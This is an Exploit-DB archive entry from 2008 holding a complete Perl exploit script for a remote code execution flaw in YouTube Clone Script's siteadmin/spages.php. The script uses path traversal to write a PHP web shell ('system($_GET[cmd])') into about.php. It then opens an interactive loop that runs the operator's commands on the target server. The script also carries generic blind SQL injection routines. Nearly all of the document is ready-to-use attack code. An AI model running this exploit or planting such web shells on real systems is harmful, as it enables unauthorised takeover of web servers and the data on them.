YouTube Clone Script - 'spages.php' Remote Code Execution

EDB-ID:

5490

CVE:

N/A


Author:

Inphex

Type:

webapps


Platform:

PHP

Date:

2008-04-23


#!/usr/bin/perl 
#inphex
#/siteadmin/spages.php
#        include("../include/config.php");
#        include("../include/function.php");
#
#        if($_REQUEST['update'])
#        {
#                $file_path = $config['BASE_DIR']."/templates/".$_REQUEST['page'];
#                if(file_exists($file_path))
#                {
#                        $handle = fopen($config['BASE_DIR']."/templates/".$_REQUEST['page'], "w");
#                        fwrite($handle,stripslashes($_POST['body']));
#                        fclose($handle);
#                        $msg = "Page updated successfully";
#                }
#                else
#                        $err = "Page does not exist";
#        }
#
#        STemplate::assign('msg',$msg);
#        STemplate::assign('err',$err);
#        STemplate::display("siteadmin/spages.tpl");
#
#Very easy one...
#YouTube-Clone-Script is quite buggy,there are more bugs.

use Digest::MD5 qw(md5 md5_hex md5_base64);
use LWP::UserAgent;
use HTTP::Cookies;
use Switch;
$host_ = shift;
$path_ = shift;

print "usage: $0 http://host /path/\n";
$info{'info'} = { 
	"author" => ["inphex"],
	"name" => ["YouTube Clone Script Remote Code Execution"],
	"version" => [],
	"description" => ["This Script will exploit a Remote Code Execution vulnerability existing in the YouTube Clone Script\n"],
	"options" =>
	{
		"agent" => "",  
		"proxy" => "",  
		"default_headers" => [  
			["key","value"]], 
		"timeout" => 2, 
		"cookie" =>     
		{
			"cookie" => ["key=value"],
		},
	},
	"sending_options" =>
	{
			"host" => $host_, 
			"path" => $path_."siteadmin/spages.php",           
		    "port" => 80,                  
			"method_a" => "REMOTE_CHECK",  
			"attack" =>
		{
				"update" => ["get","update","1"],  
				"path" => ["get","page","../about.php"],
				"content" => ["post","body","<?php echo system(\$_GET[cmd]); ?>"],
		},
	},

};
&start($info{'info'},222);
do {
	print "\$";$cmd = <STDIN>;chomp($cmd);
	$info{'info'} = { "options" =>{"agent" => "",  "proxy" => "",  "default_headers" => [  ["key","value"]], "timeout" => 2, "cookie" =>     {"cookie" => ["key=value"],},},"sending_options" =>{"host" => $host_, "path" => $path_."about.php",           "port" => 80,                  "method_a" => "CODE_EXECUTION",  "attack" =>{"cmd" => ["get","cmd",$cmd],  },},};
    &start($info{'info'},221);
    $content = ${$info{'info'}}{221}{'content'};
    print $content;
	print "\n";
} while (1);
sub start
{
	$a_ = shift;
	@EXPORT		= qw( start $return $a_ ); 
	$id = shift;
	$get_dA = get_d_p_s("get");
	$post_dA = get_d_p_s("post");
	my ($x,$c,$m,$h,$ff,$kf,$hp,$c,$cccc) = (0,0,0,0,0,0,0,0,0);
	my $jj = 1;
	my $ii = 48;
    my $hh = 1;
	my $ppp = 0;
	my $s = shift;
	my $a = "";
	my $res_p = "";
	my $h = "";
	($h_host_h_xdsjaop,$h_path_h_xdsjaop,$h_port_h_xdsjaop,$method_m) = ($a_->{'sending_options'}{'host'},$a_->{'sending_options'}{'path'},$a_->{'sending_options'}{'port'},$a_->{'sending_options'}{'method_a'});
	$ua = LWP::UserAgent->new;
	$ua->timeout($a_->{'options'}{'timeout'});  
	if ($a_->{'options'}{'proxy'}) {
	    $ua->proxy(['http', 'ftp'] => $a_->{'options'}{'proxy'});
	}
	$agent = $a_->{'options'}{'agent'} || "Mozilla/5.0"; 
	$ua->agent($agent); 
	{                                                 
		while (($k,$v) = each(%{$a_}))
			{
			if ($k ne "options" && $k ne "sending_options")
				{
				foreach $r (@{$a_->{$k}})
					{
					if ($a_->{$k}[0])
						{
						print $k.":".$a_->{$k}[0]."\n";
						}
					}
				}
			}


		foreach $j (@{$a_->{'options'}{'default_headers'}})
			{    
			$ua->default_headers->push_header($a_->{'options'}{'default_headers'}[$m][0] => $a_->{'options'}{'default_headers'}[$m][1]);
			$m++;
			}

		if ($a_->{'options'}{'cookie'}{'cookie'}[0])
			{          
			$ua->default_headers->push_header('Cookie' => $a_->{'options'}{'cookie'}{'cookie'}[0]);
			}

			

	}
	switch ($method_m)        
	{
		case "attack" { &attack();}
		case "SQL_INJECTION_BLIND" { &sql_injection_blind();}
		case "REMOTE_COMMAND_EXECUTION" { &attack();}
		case "REMOTE_CODE_EXECUTION" {&attack();}
		case "REMOTE_FILE_INCLUSION" { &attack();}
		case "LOCAL_FILE_INCLUSION" { &attack(); }
		else { &attack(); }  

	}


	sub attack
	{
		
		if ($post_dA eq "") {
			$method = "get";
		} elsif ($post_dA ne "")
		{
			$method = "post";
		}
		if ($method eq "get") {  
			$res_p = get_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA);
			${$a_}{$id}{'content'} = $res_p;
			foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
				{
				$res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;
				
				while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])
					{
					if (${$jj} ne "")
						{
						${$a_}{$id}{'regex'}[$h] = ${$jj};
						}
						$jj++;
					}
					$h++;
				}
		} elsif ($method eq "post")
		{
			$res_p = post_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA,"application/x-www-form-urlencoded",$post_dA);
		
			${$a_}{$id}{'content'} = $res_p;

			foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
				{
				$res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;
				while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])
					{
					if (${$jj} ne "")
						{
						${$a_}{$id}{'regex'}[$h] = ${$jj};
						}
						$jj++;
					}
					$h++;
				}
		}

	}
	sub sql_injection_blind
	{
		while ()
			{
			while ($ii <= 90)
				{
				if(check($ii,$hh) == 1)
				{
					syswrite STDOUT,lc(chr($ii));
					$hh++;
					$chr = $chr.chr($ii);
					}
					$ii++;
			}
			push(@ffs,length($chr)); 
			if (($#ffs -1) == $ffs)
				{
				print "\nFinished/Error\n";
				exit;
				}
				$ii = 48;
		}
	}
	sub check($$)
	{
		$ii = shift;
		$hh = shift;
		if (get_d_p_s("post") ne "")
			{
			$method = "post";
		} else { $method = "get";}
		if ($method eq "get")
			{
			$ppp++;
			$query = modify($get_dA,$ii,$hh);
			print $ii."-".$hh."\n";
			$res_p = get_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query);
			foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
				{
				if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)
					{
					return 1;
					}
					else 
				{
						return 0;
				}
				$h++;
			}
		} elsif ($method eq "post")
			{
			$ppp++;
			$query_g = modify($get_dA,$ii,$hh);
			$query_p = modify($post_dA,$ii,$hh);
			
			$res_p = post_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query_g,"application/x-www-form-urlencoded",$query_p);
			foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
				{
				if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)
					{
					return 1;
					}
					else 
					{
						return 0;
					}
				$h++;
			}
		}
	}
    sub modify($$$)
	{
	    $string = shift;
	    $replace_by = shift;
	    $replace_by1 = shift;

	    if ($string !~/\$i/ && $string !~/\$h/) {
		    print $string;
	        } elsif ($string !~/\$i/)
		{
		        $ff = substr($string,0,index($string,"\$h"));
	            $ee =  substr($string,rindex($string,"\$h")+2);
	            $string = $ff.$replace_by1.$ee;

	            return $string;
		} elsif ($string !~/\$h/)
		{
	        $f = substr($string,0,index($string,"\$i"));
	        $e = substr($string,rindex($string,"\$i")+2);
	        $string = $f.$replace_by.$e;
		    return $string;
		} else
		{
		    $f = substr($string,0,index($string,"\$i"));
	        $e = substr($string,rindex($string,"\$i")+2);
	        $string = $f.$replace_by.$e;

		    $ff = substr($string,0,index($string,"\$h"));
	        $ee =  substr($string,rindex($string,"\$h")+2);
	        $string = $ff.$replace_by1.$ee;

		    return $string;
		}
	}
	sub get_d_p_s
	{
		$g_d_p_s = shift;
		$post_data = "";
		$get_data = "";
		$header_data = "";
		%header_dA = ();
		while (($k,$v) = each(%{$a_->{'sending_options'}{'attack'}}))
			{
			if ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "get")
				{

				$method = "get"; push(@get,$a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]);
				}
				elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "post") 
				{
					$method = "post"; push(@post,$a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]);
					}
					elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "header")
				{
				        $header_dA{$a_->{'sending_options'}{'attack'}{$k}[1]} = $a_->{'sending_options'}{'attack'}{$k}[2];
				}
				$hp++;
			}
		$yy = $#get;
		while ($bb <= $#get)
			{
			$get_data .= $get[$yy]."&";
			$bb++;
			$yy--;
			}
		$l = $#post;
		while ($k <= $#post)
			{
			
			$post_data .= $post[$l]."&";
			$k++;
			$l--;
			}
		if ($g_d_p_s eq "get")
			{
			
			return $get_data;
			}
			elsif ($g_d_p_s eq "post")
		{
			return $post_data;
		} elsif ($g_d_p_s eq "header")
		{
			return %header_dA;
		}
	}
	sub get_data
	{
		$h_host_h_xdsjaop = shift;
		$h_path_h_xdsjaop = shift;
		%hash = get_d_p_s("header");
	    while (($u,$c) = each(%hash))
			{
			$ua->default_headers->push_header($u => $c);
			}
		$req = $ua->get($h_host_h_xdsjaop.$h_path_h_xdsjaop);
		return $req->content;
	}
	sub post_data
	{
		$h_host_h_xdsjaop = shift;
		$h_path_h_xdsjaop = shift;
		$content_type = shift;
		$send = shift;
		%hash = get_d_p_s("header");
	    while (($u,$c) = each(%hash))
			{
		    $ua->default_headers->push_header($u => $c);
			}
		$req = HTTP::Request->new(POST => $h_host_h_xdsjaop.$h_path_h_xdsjaop);
		$req->content_type($content_type);
		$req->content($send);
		$res = $ua->request($req);
		return $res->content;
	}

}

# milw0rm.com [2008-04-23]